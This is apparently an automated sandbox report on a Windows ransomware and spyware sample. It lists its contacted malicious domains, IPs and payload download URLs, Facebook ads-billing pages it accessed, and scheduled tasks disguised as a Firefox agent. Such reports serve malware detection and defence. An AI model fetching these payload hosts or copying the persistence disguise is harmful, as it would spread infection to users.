                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3ag0%Avira URL Cloudsafe
                http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                star-mini.c10r.facebook.com
                157.240.20.35
                truefalse
                  high
                  jamesmillion.xyz
                  104.192.2.242
                  truetrueunknown
                  avtlsgosecure.com
                  34.91.216.49
                  truefalseunknown
                  github.com
                  140.82.121.3
                  truefalse
                    high
                    raw.githubusercontent.com
                    185.199.108.133
                    truefalseunknown
                    dldsystem.com
                    162.144.15.231
                    truetrue
                      unknown
                      api.2ip.ua
                      162.0.217.254
                      truefalse
                        high
                        aaa.apiaaaeg.com
                        45.136.151.102
                        truetrueunknown
                        furubujjul.net
                        104.21.93.30
                        truetrue
                          unknown
                          pelegisr.com
                          185.220.204.62
                          truetrue
                            unknown
                            1drv.ms
                            13.107.42.12
                            truefalse
                              high
                              www.facebook.com
                              unknown
                              unknownfalse
                                high
                                onedrive.live.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://aaa.apiaaaeg.com/check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf6030true
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dldsystem.com/jamesp.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingfalse
                                    high
                                    http://185.174.137.174/s.exetrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://avtlsgosecure.com/false
                                    • URL Reputation: safe
                                    unknown
                                    http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3atrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://aaa.apiaaaeg.com/check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b2true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://nuluitnulo.me/true
                                    • URL Reputation: safe
                                    unknown
                                    http://winnlinne.com/lancer/get.phptrue
                                    • URL Reputation: safe
                                    unknown
                                    http://bururutu44org.org/true
                                    • URL Reputation: safe
                                    unknown
                                    http://nvulukuluir.net/true
                                    • URL Reputation: safe
                                    unknown
                                    http://liubertiyyyul.net/true
                                    • URL Reputation: safe
                                    unknown
                                    http://furubujjul.net/true
                                    • URL Reputation: safe
                                    unknown
                                    https://api.2ip.ua/geo.jsonfalse
                                      high
                                      http://youyouumenia5.org/true
                                      • URL Reputation: safe
                                      unknown
                                      https://dldsystem.com/7.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://guluiiiimnstra.net/true
                                      • URL Reputation: safe
                                      unknown
                                      http://aaa.apiaaaeg.com/check/safetrue
                                      • URL Reputation: safe
                                      unknown
                                      http://aaa.apiaaaeg.com/check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aaetrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.facebook.com/ads/manager/account_settings/account_billingfalse
                                        high
                                        https://pelegisr.com/upload/ChromeSetup.exefalse
                                        • URL Reputation: safe
                                        unknown
                                        http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtab956C.tmp.14.drfalse
                                          high
                                          https://static.xx.fbcdn.net/TT8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=956C.tmp.14.drfalse
                                              high
                                              https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://api.2ip.ua/geo.jsonE=6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://messenger.com/8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3awal8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adg8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://search.yahoo.com?fr=crmas_sfpf956C.tmp.14.drfalse
                                                        high
                                                        https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3aal8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aaa.apiaaaeg.com/8C19.exe, 0000000A.00000003.538167010.00000000023CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.openssl.org/support/faq.html6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://api.2ip.ua/geo.json~6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/lwJdNrJ0mJk.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.2ip.ua/geo.jsondll.6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://static.xx.fbcdn.net/8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/08C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/_S6bZc2Nrqz.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.367799571.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319113552.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.403304956.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad68C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad18C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api.2ip.ua/6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico956C.tmp.14.drfalse
                                                                                        high
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=956C.tmp.14.drfalse
                                                                                            high
                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search956C.tmp.14.drfalse
                                                                                                high
                                                                                                https://api.2ip.ua/geo.jsong6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=956C.tmp.14.drfalse
                                                                                                    high
                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.2ip.ua/fo6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://static.xx.fbcdn.net/ninstagram.8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/08C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ac.ecosia.org/autocomplete?q=956C.tmp.14.drfalse
                                                                                                              high
                                                                                                              https://search.yahoo.com?fr=crmas_sfp956C.tmp.14.drfalse
                                                                                                                high
                                                                                                                http://aaa.apiaaaeg.coaa.apiaaaeg.com/8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559703582.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3ag8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://api.2ip.ua/geo.json16246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/08C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://furubujjul.net/Mozilla/5.0explorer.exe, 0000000F.00000002.498010000.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.494090495.0000000000910000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://api.2ip.ua/geo.jsonI6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=956C.tmp.14.drfalse
                                                                                                                              high
                                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  104.21.93.30
                                                                                                                                  furubujjul.netUnited States
                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                  31.13.92.36
                                                                                                                                  unknownIreland
                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                  185.220.204.62
                                                                                                                                  pelegisr.comIsrael
                                                                                                                                  41436CLOUDWEBMANAGE-EUGBtrue
                                                                                                                                  140.82.121.3
                                                                                                                                  github.comUnited States
                                                                                                                                  36459GITHUBUSfalse
                                                                                                                                  162.144.15.231
                                                                                                                                  dldsystem.comUnited States
                                                                                                                                  46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                  34.91.216.49
                                                                                                                                  avtlsgosecure.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  162.0.217.254
                                                                                                                                  api.2ip.uaCanada
                                                                                                                                  35893ACPCAfalse
                                                                                                                                  185.174.137.174
                                                                                                                                  unknownRussian Federation
                                                                                                                                  50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                  157.240.20.35
                                                                                                                                  star-mini.c10r.facebook.comUnited States
                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                  45.136.151.102
                                                                                                                                  aaa.apiaaaeg.comLatvia
                                                                                                                                  18978ENZUINC-UStrue
                                                                                                                                  IP
                                                                                                                                  192.168.2.1
                                                                                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                  Analysis ID:724879
                                                                                                                                  Start date and time:2022-10-17 22:04:18 +02:00
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 12m 26s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Sample file name:file.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:21
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@24/24@23/11
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 57.7% (good quality ratio 54.1%)
                                                                                                                                  • Quality average: 78.3%
                                                                                                                                  • Quality standard deviation: 29.1%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                  • Number of executed functions: 25
                                                                                                                                  • Number of non-executed functions: 54
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.21, 13.107.42.13
                                                                                                                                  • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  TimeTypeDescription
                                                                                                                                  22:06:29Task SchedulerRun new task: Firefox Default Browser Agent 40D8CDDD622645CF path: C:\Users\user\AppData\Roaming\thduhcf
                                                                                                                                  22:07:01API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                  22:07:04API Interceptor13x Sleep call for process: 8C19.exe modified
                                                                                                                                  22:07:12Task SchedulerRun new task: Firefox Default Browser Agent 62DC1AFC56E25B06 path: C:\Users\user\AppData\Roaming\idduhcf
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  104.21.93.30file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • furubujjul.net/
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  jamesmillion.xyzfile.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  V573LzlA6u.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  x8TZhOscJi.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  R44EKapFtE.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  9h0ODJO230.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  D8Yo1xzSrO.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  M5sGwiInRJ.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  GH1RPIdmzR.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  LNNOKS54yR.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  s6LVjIVEzL.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  KCqftBk8gk.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
